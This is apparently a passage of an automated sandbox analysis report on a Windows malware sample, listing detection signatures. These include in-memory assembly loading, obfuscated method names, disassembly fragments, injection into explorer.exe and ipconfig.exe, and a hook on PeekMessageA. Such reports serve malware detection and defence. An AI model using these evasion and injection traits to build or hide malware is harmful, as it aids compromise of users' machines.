          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, VrMKeGIZlmivmEjgSP.cs.Net Code: j4yhUticLl System.Reflection.Assembly.Load(byte[])
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, VrMKeGIZlmivmEjgSP.cs.Net Code: j4yhUticLl System.Reflection.Assembly.Load(byte[])
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, VrMKeGIZlmivmEjgSP.cs.Net Code: j4yhUticLl System.Reflection.Assembly.Load(byte[])
          Source: 6.2.explorer.exe.103cf840.0.raw.unpack, Form9.cs.Net Code: InitializeComponent contains xor as well as GetObject
          Source: 7.2.ipconfig.exe.31cf840.3.raw.unpack, Form9.cs.Net Code: InitializeComponent contains xor as well as GetObject
          Source: hj3YCvtlg7.exeStatic PE information: 0x9D7A1105 [Sat Sep 20 23:11:01 2053 UTC]
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_00417090 pushad ; iretd 5_2_00417096
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041E266 push E89010BFh; ret 5_2_0041E582
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041EA1C push dword ptr [D4EF9124h]; ret 5_2_0041EA3E
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041D4B5 push eax; ret 5_2_0041D508
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041D56C push eax; ret 5_2_0041D572
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041D502 push eax; ret 5_2_0041D508
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041D50B push eax; ret 5_2_0041D572
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_00402D89 push ebp; iretd 5_2_00402D8A
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017209AD push ecx; mov dword ptr [esp], ecx5_2_017209B6
          Source: C:\Windows\explorer.exeCode function: 6_2_0E3B8B1E push esp; retn 0000h6_2_0E3B8B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0E3B8B02 push esp; retn 0000h6_2_0E3B8B03
          Source: C:\Windows\explorer.exeCode function: 6_2_0E3B89B5 push esp; retn 0000h6_2_0E3B8AE7
          Source: C:\Windows\explorer.exeCode function: 6_2_0FDA99B5 push esp; retn 0000h6_2_0FDA9AE7
          Source: C:\Windows\explorer.exeCode function: 6_2_0FDA9B1E push esp; retn 0000h6_2_0FDA9B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0FDA9B02 push esp; retn 0000h6_2_0FDA9B03
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00C7570D push ecx; ret 7_2_00C75720
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02C8225F pushad ; ret 7_2_02C827F9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02C827FA pushad ; ret 7_2_02C827F9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02C8283D push eax; iretd 7_2_02C82858
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CB09AD push ecx; mov dword ptr [esp], ecx7_2_02CB09B6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02C81368 push eax; iretd 7_2_02C81369
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02C8106B push edi; retf 7_2_02C8108A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001E7090 pushad ; iretd 7_2_001E7096
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001EE266 push E89010BFh; ret 7_2_001EE582
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001ED4B5 push eax; ret 7_2_001ED508
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001ED50B push eax; ret 7_2_001ED572
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001ED502 push eax; ret 7_2_001ED508
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001ED56C push eax; ret 7_2_001ED572
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001EEA1C push dword ptr [D4EF9124h]; ret 7_2_001EEA3E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001D2D89 push ebp; iretd 7_2_001D2D8A
          Source: hj3YCvtlg7.exeStatic PE information: section name: .text entropy: 7.867960942113154
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, vSttqFiNx4yhRVEK5W.csHigh entropy of concatenated method names: 'm3XfCQnLOP', 'NGJfjUKHQm', 'WC75mn8IXw', 'LPb5Sttem3', 'wiQ5WyyVCt', 'XTA56D6q60', 'qt75Qptlm0', 'KhU5ec1iIH', 'jX25iGscUg', 'JEG5tgJ88V'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, zkamj8fyjUFsj4DNVS.csHigh entropy of concatenated method names: 'T9KqZtaMNo', 'sPgq36TnD4', 'MYS7xZNbc6', 'JCF7rvGX4i', 'b17qaDh6Iu', 'tF8qDdmDF9', 'XLYq4osAtj', 'ULXqOFLmHe', 'XxhqbVHVLG', 'uTaq2YpC89'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, RlRY3MtuqSyeeD1ltL.csHigh entropy of concatenated method names: 'ToString', 'qwj1aL01yV', 'kkE1K2Rsn2', 'V1N1mTKqOi', 'j1G1SA0hEp', 'SEp1WMBLoQ', 'xch169Gv2N', 'S431QrGxpP', 'Xuu1ey0DRQ', 'sIF1iVl4ux'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, oYWDQbVoSt3rrZLCP8.csHigh entropy of concatenated method names: 'yt1AXmx4UQ', 'wdkAph5j0n', 'nJsAUf9fpr', 'WwjAcXP9ix', 'NfVACGw2RJ', 'QpNARW7Dtr', 'Hc6Ajb4dHa', 'j6MA8jcHiA', 'vyRAvW8nRd', 'sMiAHgveJd'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, TFoKLcY3ARFt2FB1fbQ.csHigh entropy of concatenated method names: 'XRkTX6NFGT', 'i86TpXDhV5', 'wDWTU8MlAQ', 'kqKTceFNia', 'DQsTCEAUBq', 'uVwTRAASCl', 'gvFTjNdNFC', 'y4hT8VEdDs', 'cKbTvHCQJm', 'pLETHJy9nu'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, VktMXjAK6HSiWFAtLS.csHigh entropy of concatenated method names: 'wHCY8qqT55', 'ffkYvmean9', 'pCSYIZaEgW', 'n4EYKs7w8s', 'N0MYSKn3PD', 'i1GYWAhIgh', 'mmiYQo5k3v', 'rCNYeXhxDF', 'FegYtxMKpD', 'F8vYaVo77j'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, I75gnI2kL9ppKmFoA0.csHigh entropy of concatenated method names: 'k5LGVUVHKE', 'VEpGyepvK6', 'vNdGfKFpCI', 'THjGAJunZh', 'W25GFa2QQu', 'UTBfExLqAr', 'FaMfPhQgVP', 'DGcfJQ9vsh', 'tBgfZZDTaA', 'erjfkvnNRh'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, NaFpgHhPZjkBVhYoCC.csHigh entropy of concatenated method names: 'ynbrAQDJhx', 'GnBrFK1EgR', 'BAArlwXhlr', 'Om0rwyA7wq', 'viIroROMNh', 'sTtr1uLZZt', 'rMAEsmpER2dbrwEyqe', 'Dy7X9UG637MJvHo02T', 'VGGrrclxpT', 'FKtrNFpmVJ'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, lrimIHsJxt3UWxuIeo.csHigh entropy of concatenated method names: 'ED9ql7aGMW', 'tiBqwGbYL2', 'ToString', 'lHFqLcHiEh', 'npkqyck6O3', 'ijbq5W6Q46', 'XsbqfoLdZd', 'LOQqGhUAPc', 'VkEqA26P4e', 'J6BqFTEG8w'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, lZf4Py4jUCe74NUT5g.csHigh entropy of concatenated method names: 'Dispose', 'KrurkHxmUd', 'mTrgKZE4JS', 'fcnnnW0ij5', 'U7Nr33Qnc7', 'QERrzmXV33', 'ProcessDialogKey', 'I1YgxCAJTx', 'FJSgrwQfFS', 'zJTggUxrUN'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, BbLeYsClKqdpZlysFh.csHigh entropy of concatenated method names: 'gw65cWBvRI', 'bw15RFeHTY', 'brL58UWuI8', 'SIJ5vimvkl', 'uEw5oSC66t', 'TKw516XRH3', 'IWF5qCjXM4', 'MuK57Rnh6H', 'BDP5TKrDfo', 'no859DjbU4'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, M4cKctOuk68Oc7Rd9m.csHigh entropy of concatenated method names: 'EikyO6siUJ', 'KWpyboqm5I', 'dBWy2THbTO', 'XMgy0kZKpa', 'YWfyEW0qC2', 'SkvyPK9WUD', 'YWuyJOkjxL', 'cIwyZLsNnb', 'kaUykWaySn', 'gyJy38YOh6'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, iAtTLKaUooI6ORehwu.csHigh entropy of concatenated method names: 'GgTALJLdTW', 'HiOA5Ino3C', 'x8LAGbw44b', 'rCMG3wBxc4', 'x36GzBngBv', 's64AxJR6al', 'QbpArnWTLr', 'cL8Ag5FWr3', 'Yu5ANIWWIQ', 'KbuAhP7MN7'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, EjsN49YM3I6qvqaWLoa.csHigh entropy of concatenated method names: 'KhY9XqsybY', 'nnm9pH5bRT', 'XCM9UOp17M', 'yZ0m0kDpg8e921wDiAk', 'JI7FvWDGhYU5itT3Efq', 'u4tcOrDlJhg7dTfQtZL', 'juAG4PDykS7SCHLvNUQ'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, VrMKeGIZlmivmEjgSP.csHigh entropy of concatenated method names: 'QBKNVLSOJs', 'MFKNLdH62T', 'hSoNyFbeLB', 'jbvN5i6AfB', 'TlGNfEoLIT', 'lL5NGA77Qm', 'CvNNASva04', 'ITmNFNeICa', 'anMNsU2P4x', 'uKSNlerWqL'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, rW5l9Ror7rYmm0uNHK.csHigh entropy of concatenated method names: 'it07IXZTGZ', 'l8k7K6H973', 'Spw7mrhjJq', 'jWs7S3JpH0', 'xJu7O8EICS', 'gW97W8xCRu', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, xrCaFdyNl8mr4igEg1.csHigh entropy of concatenated method names: 'Of17LnT9Tt', 'MfY7yCTtQp', 'sr2759SDZg', 'xel7fD6l0m', 'tDU7GXsZ1h', 'TAe7Ara46A', 'KAp7FxWess', 'KjD7sxTZ9Q', 'Xy07lvm6N9', 'nNA7wvpbP5'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, PwqSttQ2Ue8TWoP6rF.csHigh entropy of concatenated method names: 'ghgTr0O3Pe', 'VqLTNluQAT', 'dDTThVJ4Db', 'BGbTLf64RB', 'HO9TyYc0hn', 'otTTftfhGm', 'XxxTGHpMf7', 'Sdq7Jmfxhg', 'Y2l7ZNOnM4', 'Ir07kXZ0a1'
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, ntQV3lM3nQNvti1MVn.csHigh entropy of concatenated method names: 'xXAU1kRUS', 'n5dcn2axI', 'qpsRpcedq', 'q11j1btCM', 'z0Nv1bUOD', 'k9vHSF1LB', 'VkTrtFAfCGP9inkfFY', 'AY84bgueJl1WBJC3xh', 'kuJ7HaS67', 'gAi9k85iV'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, vSttqFiNx4yhRVEK5W.csHigh entropy of concatenated method names: 'm3XfCQnLOP', 'NGJfjUKHQm', 'WC75mn8IXw', 'LPb5Sttem3', 'wiQ5WyyVCt', 'XTA56D6q60', 'qt75Qptlm0', 'KhU5ec1iIH', 'jX25iGscUg', 'JEG5tgJ88V'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, zkamj8fyjUFsj4DNVS.csHigh entropy of concatenated method names: 'T9KqZtaMNo', 'sPgq36TnD4', 'MYS7xZNbc6', 'JCF7rvGX4i', 'b17qaDh6Iu', 'tF8qDdmDF9', 'XLYq4osAtj', 'ULXqOFLmHe', 'XxhqbVHVLG', 'uTaq2YpC89'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, RlRY3MtuqSyeeD1ltL.csHigh entropy of concatenated method names: 'ToString', 'qwj1aL01yV', 'kkE1K2Rsn2', 'V1N1mTKqOi', 'j1G1SA0hEp', 'SEp1WMBLoQ', 'xch169Gv2N', 'S431QrGxpP', 'Xuu1ey0DRQ', 'sIF1iVl4ux'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, oYWDQbVoSt3rrZLCP8.csHigh entropy of concatenated method names: 'yt1AXmx4UQ', 'wdkAph5j0n', 'nJsAUf9fpr', 'WwjAcXP9ix', 'NfVACGw2RJ', 'QpNARW7Dtr', 'Hc6Ajb4dHa', 'j6MA8jcHiA', 'vyRAvW8nRd', 'sMiAHgveJd'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, TFoKLcY3ARFt2FB1fbQ.csHigh entropy of concatenated method names: 'XRkTX6NFGT', 'i86TpXDhV5', 'wDWTU8MlAQ', 'kqKTceFNia', 'DQsTCEAUBq', 'uVwTRAASCl', 'gvFTjNdNFC', 'y4hT8VEdDs', 'cKbTvHCQJm', 'pLETHJy9nu'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, VktMXjAK6HSiWFAtLS.csHigh entropy of concatenated method names: 'wHCY8qqT55', 'ffkYvmean9', 'pCSYIZaEgW', 'n4EYKs7w8s', 'N0MYSKn3PD', 'i1GYWAhIgh', 'mmiYQo5k3v', 'rCNYeXhxDF', 'FegYtxMKpD', 'F8vYaVo77j'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, I75gnI2kL9ppKmFoA0.csHigh entropy of concatenated method names: 'k5LGVUVHKE', 'VEpGyepvK6', 'vNdGfKFpCI', 'THjGAJunZh', 'W25GFa2QQu', 'UTBfExLqAr', 'FaMfPhQgVP', 'DGcfJQ9vsh', 'tBgfZZDTaA', 'erjfkvnNRh'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, NaFpgHhPZjkBVhYoCC.csHigh entropy of concatenated method names: 'ynbrAQDJhx', 'GnBrFK1EgR', 'BAArlwXhlr', 'Om0rwyA7wq', 'viIroROMNh', 'sTtr1uLZZt', 'rMAEsmpER2dbrwEyqe', 'Dy7X9UG637MJvHo02T', 'VGGrrclxpT', 'FKtrNFpmVJ'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, lrimIHsJxt3UWxuIeo.csHigh entropy of concatenated method names: 'ED9ql7aGMW', 'tiBqwGbYL2', 'ToString', 'lHFqLcHiEh', 'npkqyck6O3', 'ijbq5W6Q46', 'XsbqfoLdZd', 'LOQqGhUAPc', 'VkEqA26P4e', 'J6BqFTEG8w'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, lZf4Py4jUCe74NUT5g.csHigh entropy of concatenated method names: 'Dispose', 'KrurkHxmUd', 'mTrgKZE4JS', 'fcnnnW0ij5', 'U7Nr33Qnc7', 'QERrzmXV33', 'ProcessDialogKey', 'I1YgxCAJTx', 'FJSgrwQfFS', 'zJTggUxrUN'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, BbLeYsClKqdpZlysFh.csHigh entropy of concatenated method names: 'gw65cWBvRI', 'bw15RFeHTY', 'brL58UWuI8', 'SIJ5vimvkl', 'uEw5oSC66t', 'TKw516XRH3', 'IWF5qCjXM4', 'MuK57Rnh6H', 'BDP5TKrDfo', 'no859DjbU4'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, M4cKctOuk68Oc7Rd9m.csHigh entropy of concatenated method names: 'EikyO6siUJ', 'KWpyboqm5I', 'dBWy2THbTO', 'XMgy0kZKpa', 'YWfyEW0qC2', 'SkvyPK9WUD', 'YWuyJOkjxL', 'cIwyZLsNnb', 'kaUykWaySn', 'gyJy38YOh6'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, iAtTLKaUooI6ORehwu.csHigh entropy of concatenated method names: 'GgTALJLdTW', 'HiOA5Ino3C', 'x8LAGbw44b', 'rCMG3wBxc4', 'x36GzBngBv', 's64AxJR6al', 'QbpArnWTLr', 'cL8Ag5FWr3', 'Yu5ANIWWIQ', 'KbuAhP7MN7'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, EjsN49YM3I6qvqaWLoa.csHigh entropy of concatenated method names: 'KhY9XqsybY', 'nnm9pH5bRT', 'XCM9UOp17M', 'yZ0m0kDpg8e921wDiAk', 'JI7FvWDGhYU5itT3Efq', 'u4tcOrDlJhg7dTfQtZL', 'juAG4PDykS7SCHLvNUQ'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, VrMKeGIZlmivmEjgSP.csHigh entropy of concatenated method names: 'QBKNVLSOJs', 'MFKNLdH62T', 'hSoNyFbeLB', 'jbvN5i6AfB', 'TlGNfEoLIT', 'lL5NGA77Qm', 'CvNNASva04', 'ITmNFNeICa', 'anMNsU2P4x', 'uKSNlerWqL'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, rW5l9Ror7rYmm0uNHK.csHigh entropy of concatenated method names: 'it07IXZTGZ', 'l8k7K6H973', 'Spw7mrhjJq', 'jWs7S3JpH0', 'xJu7O8EICS', 'gW97W8xCRu', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, xrCaFdyNl8mr4igEg1.csHigh entropy of concatenated method names: 'Of17LnT9Tt', 'MfY7yCTtQp', 'sr2759SDZg', 'xel7fD6l0m', 'tDU7GXsZ1h', 'TAe7Ara46A', 'KAp7FxWess', 'KjD7sxTZ9Q', 'Xy07lvm6N9', 'nNA7wvpbP5'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, PwqSttQ2Ue8TWoP6rF.csHigh entropy of concatenated method names: 'ghgTr0O3Pe', 'VqLTNluQAT', 'dDTThVJ4Db', 'BGbTLf64RB', 'HO9TyYc0hn', 'otTTftfhGm', 'XxxTGHpMf7', 'Sdq7Jmfxhg', 'Y2l7ZNOnM4', 'Ir07kXZ0a1'
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, ntQV3lM3nQNvti1MVn.csHigh entropy of concatenated method names: 'xXAU1kRUS', 'n5dcn2axI', 'qpsRpcedq', 'q11j1btCM', 'z0Nv1bUOD', 'k9vHSF1LB', 'VkTrtFAfCGP9inkfFY', 'AY84bgueJl1WBJC3xh', 'kuJ7HaS67', 'gAi9k85iV'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, vSttqFiNx4yhRVEK5W.csHigh entropy of concatenated method names: 'm3XfCQnLOP', 'NGJfjUKHQm', 'WC75mn8IXw', 'LPb5Sttem3', 'wiQ5WyyVCt', 'XTA56D6q60', 'qt75Qptlm0', 'KhU5ec1iIH', 'jX25iGscUg', 'JEG5tgJ88V'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, zkamj8fyjUFsj4DNVS.csHigh entropy of concatenated method names: 'T9KqZtaMNo', 'sPgq36TnD4', 'MYS7xZNbc6', 'JCF7rvGX4i', 'b17qaDh6Iu', 'tF8qDdmDF9', 'XLYq4osAtj', 'ULXqOFLmHe', 'XxhqbVHVLG', 'uTaq2YpC89'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, RlRY3MtuqSyeeD1ltL.csHigh entropy of concatenated method names: 'ToString', 'qwj1aL01yV', 'kkE1K2Rsn2', 'V1N1mTKqOi', 'j1G1SA0hEp', 'SEp1WMBLoQ', 'xch169Gv2N', 'S431QrGxpP', 'Xuu1ey0DRQ', 'sIF1iVl4ux'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, oYWDQbVoSt3rrZLCP8.csHigh entropy of concatenated method names: 'yt1AXmx4UQ', 'wdkAph5j0n', 'nJsAUf9fpr', 'WwjAcXP9ix', 'NfVACGw2RJ', 'QpNARW7Dtr', 'Hc6Ajb4dHa', 'j6MA8jcHiA', 'vyRAvW8nRd', 'sMiAHgveJd'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, TFoKLcY3ARFt2FB1fbQ.csHigh entropy of concatenated method names: 'XRkTX6NFGT', 'i86TpXDhV5', 'wDWTU8MlAQ', 'kqKTceFNia', 'DQsTCEAUBq', 'uVwTRAASCl', 'gvFTjNdNFC', 'y4hT8VEdDs', 'cKbTvHCQJm', 'pLETHJy9nu'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, VktMXjAK6HSiWFAtLS.csHigh entropy of concatenated method names: 'wHCY8qqT55', 'ffkYvmean9', 'pCSYIZaEgW', 'n4EYKs7w8s', 'N0MYSKn3PD', 'i1GYWAhIgh', 'mmiYQo5k3v', 'rCNYeXhxDF', 'FegYtxMKpD', 'F8vYaVo77j'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, I75gnI2kL9ppKmFoA0.csHigh entropy of concatenated method names: 'k5LGVUVHKE', 'VEpGyepvK6', 'vNdGfKFpCI', 'THjGAJunZh', 'W25GFa2QQu', 'UTBfExLqAr', 'FaMfPhQgVP', 'DGcfJQ9vsh', 'tBgfZZDTaA', 'erjfkvnNRh'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, NaFpgHhPZjkBVhYoCC.csHigh entropy of concatenated method names: 'ynbrAQDJhx', 'GnBrFK1EgR', 'BAArlwXhlr', 'Om0rwyA7wq', 'viIroROMNh', 'sTtr1uLZZt', 'rMAEsmpER2dbrwEyqe', 'Dy7X9UG637MJvHo02T', 'VGGrrclxpT', 'FKtrNFpmVJ'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, lrimIHsJxt3UWxuIeo.csHigh entropy of concatenated method names: 'ED9ql7aGMW', 'tiBqwGbYL2', 'ToString', 'lHFqLcHiEh', 'npkqyck6O3', 'ijbq5W6Q46', 'XsbqfoLdZd', 'LOQqGhUAPc', 'VkEqA26P4e', 'J6BqFTEG8w'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, lZf4Py4jUCe74NUT5g.csHigh entropy of concatenated method names: 'Dispose', 'KrurkHxmUd', 'mTrgKZE4JS', 'fcnnnW0ij5', 'U7Nr33Qnc7', 'QERrzmXV33', 'ProcessDialogKey', 'I1YgxCAJTx', 'FJSgrwQfFS', 'zJTggUxrUN'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, BbLeYsClKqdpZlysFh.csHigh entropy of concatenated method names: 'gw65cWBvRI', 'bw15RFeHTY', 'brL58UWuI8', 'SIJ5vimvkl', 'uEw5oSC66t', 'TKw516XRH3', 'IWF5qCjXM4', 'MuK57Rnh6H', 'BDP5TKrDfo', 'no859DjbU4'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, M4cKctOuk68Oc7Rd9m.csHigh entropy of concatenated method names: 'EikyO6siUJ', 'KWpyboqm5I', 'dBWy2THbTO', 'XMgy0kZKpa', 'YWfyEW0qC2', 'SkvyPK9WUD', 'YWuyJOkjxL', 'cIwyZLsNnb', 'kaUykWaySn', 'gyJy38YOh6'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, iAtTLKaUooI6ORehwu.csHigh entropy of concatenated method names: 'GgTALJLdTW', 'HiOA5Ino3C', 'x8LAGbw44b', 'rCMG3wBxc4', 'x36GzBngBv', 's64AxJR6al', 'QbpArnWTLr', 'cL8Ag5FWr3', 'Yu5ANIWWIQ', 'KbuAhP7MN7'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, EjsN49YM3I6qvqaWLoa.csHigh entropy of concatenated method names: 'KhY9XqsybY', 'nnm9pH5bRT', 'XCM9UOp17M', 'yZ0m0kDpg8e921wDiAk', 'JI7FvWDGhYU5itT3Efq', 'u4tcOrDlJhg7dTfQtZL', 'juAG4PDykS7SCHLvNUQ'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, VrMKeGIZlmivmEjgSP.csHigh entropy of concatenated method names: 'QBKNVLSOJs', 'MFKNLdH62T', 'hSoNyFbeLB', 'jbvN5i6AfB', 'TlGNfEoLIT', 'lL5NGA77Qm', 'CvNNASva04', 'ITmNFNeICa', 'anMNsU2P4x', 'uKSNlerWqL'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, rW5l9Ror7rYmm0uNHK.csHigh entropy of concatenated method names: 'it07IXZTGZ', 'l8k7K6H973', 'Spw7mrhjJq', 'jWs7S3JpH0', 'xJu7O8EICS', 'gW97W8xCRu', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, xrCaFdyNl8mr4igEg1.csHigh entropy of concatenated method names: 'Of17LnT9Tt', 'MfY7yCTtQp', 'sr2759SDZg', 'xel7fD6l0m', 'tDU7GXsZ1h', 'TAe7Ara46A', 'KAp7FxWess', 'KjD7sxTZ9Q', 'Xy07lvm6N9', 'nNA7wvpbP5'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, PwqSttQ2Ue8TWoP6rF.csHigh entropy of concatenated method names: 'ghgTr0O3Pe', 'VqLTNluQAT', 'dDTThVJ4Db', 'BGbTLf64RB', 'HO9TyYc0hn', 'otTTftfhGm', 'XxxTGHpMf7', 'Sdq7Jmfxhg', 'Y2l7ZNOnM4', 'Ir07kXZ0a1'
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, ntQV3lM3nQNvti1MVn.csHigh entropy of concatenated method names: 'xXAU1kRUS', 'n5dcn2axI', 'qpsRpcedq', 'q11j1btCM', 'z0Nv1bUOD', 'k9vHSF1LB', 'VkTrtFAfCGP9inkfFY', 'AY84bgueJl1WBJC3xh', 'kuJ7HaS67', 'gAi9k85iV'

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEF
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
